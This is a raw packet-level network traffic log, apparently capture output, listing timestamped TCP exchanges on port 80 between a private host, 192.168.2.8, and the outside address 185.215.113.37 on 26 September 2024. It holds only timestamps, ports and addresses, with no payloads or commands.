Sep 26, 2024 06:00:19.582887888 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.582894087 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.582900047 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.582902908 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.582922935 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.582931995 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.582941055 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.582952023 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.582958937 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.582968950 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.582978010 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.582981110 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.582992077 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583003044 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583005905 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.583015919 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583034992 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.583050013 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583054066 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.583061934 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583074093 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583091021 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.583100080 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583113909 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583117008 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.583125114 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583136082 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583141088 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.583147049 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583158970 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583169937 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583169937 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.583183050 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583193064 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583195925 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.583204031 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583209991 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.583216906 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583229065 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583233118 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.583261013 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583265066 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.583273888 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583286047 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583304882 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.583312035 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.583328962 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.583340883 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.583359957 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584150076 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584198952 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584208012 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584208965 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584235907 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584238052 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584248066 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584254026 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584260941 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584273100 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584275961 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584290981 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584319115 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584338903 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584351063 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584362030 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584372997 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584387064 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584391117 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584402084 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584409952 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584414005 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584425926 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584428072 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584436893 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584465981 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584476948 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584511042 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584525108 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584536076 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584547043 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584554911 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584561110 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584570885 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584573984 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584592104 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584602118 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584616899 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584680080 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584779024 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584789038 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584800005 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584810972 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584822893 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584834099 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584835052 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584858894 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584880114 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584932089 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584943056 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584954023 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584970951 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584975004 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584983110 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.584990978 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.584995031 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.585006952 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.585016966 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.585017920 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.585033894 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.585040092 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.585045099 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.585057974 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.585087061 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.668580055 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.668644905 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.668689013 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.668699026 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.668710947 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.668720961 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.668721914 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.668726921 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.668734074 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.668766975 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.668792963 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.668803930 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.668814898 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.668824911 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.668829918 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.668838024 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.668847084 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.668848991 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.668862104 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.668864012 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.668881893 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.668889999 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.668916941 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.668957949 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.668970108 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.668982983 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.668992996 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.668994904 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669012070 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669013977 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669027090 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669039011 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669043064 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669054985 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669069052 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669074059 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669085026 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669095993 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669095993 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669107914 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669111013 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669126987 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669136047 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669140100 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669152975 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669162035 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669167995 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669173956 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669182062 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669186115 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669197083 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669198036 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669219017 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669229031 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669235945 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669248104 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669254065 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669266939 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669277906 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669281006 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669290066 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669301033 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669306993 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669312000 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669326067 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669326067 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669339895 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669351101 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669359922 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669369936 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669375896 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669379950 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669398069 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669400930 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669414043 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669418097 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669425964 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669436932 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669442892 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669457912 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669459105 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669475079 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669485092 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669486046 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669498920 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669511080 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669511080 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669524908 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669533968 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669550896 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669574976 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669719934 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669739008 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669749975 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669759989 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669763088 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669774055 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669779062 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669785976 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669797897 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669806957 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669809103 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669821024 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669827938 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669831991 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669841051 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.669864893 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.669887066 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.709424973 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.714359999 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926419973 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926526070 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.926544905 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926557064 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926568031 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926582098 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926590919 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.926594973 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926609039 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926615000 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.926620960 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926673889 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.926695108 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926712990 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926723957 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926734924 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926734924 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.926748991 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926759005 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926770926 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926781893 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926781893 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.926793098 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926800966 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.926804066 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926816940 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926820040 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.926839113 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926842928 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.926850080 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926860094 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926872015 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926872969 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.926882982 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926894903 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926899910 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.926906109 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926918983 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926928043 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926928043 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.926942110 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926947117 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.926954031 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926965952 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926970959 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.926980019 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.926995039 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927002907 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927014112 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927015066 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927032948 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927045107 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927048922 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927057028 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927067041 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927074909 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927078962 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927090883 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927097082 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927139044 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927166939 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927185059 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927196026 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927206039 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927207947 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927217007 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927228928 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927239895 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927239895 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927252054 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927263021 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927268982 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927274942 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927287102 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927289009 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927299976 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927308083 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927313089 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927339077 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927345991 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927357912 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927365065 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927370071 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927401066 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927422047 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927503109 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927514076 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927525997 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927535057 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927542925 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927558899 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927582026 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927638054 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927649975 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927659988 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927671909 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.927683115 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.927711964 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.928179979 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.928191900 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.928203106 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.928212881 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.928227901 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.928237915 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.928239107 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.928251982 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.928255081 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.928267002 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:19.928272009 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:19.928282022 CEST	80	49704	185.215.113.37	192.168.2.8
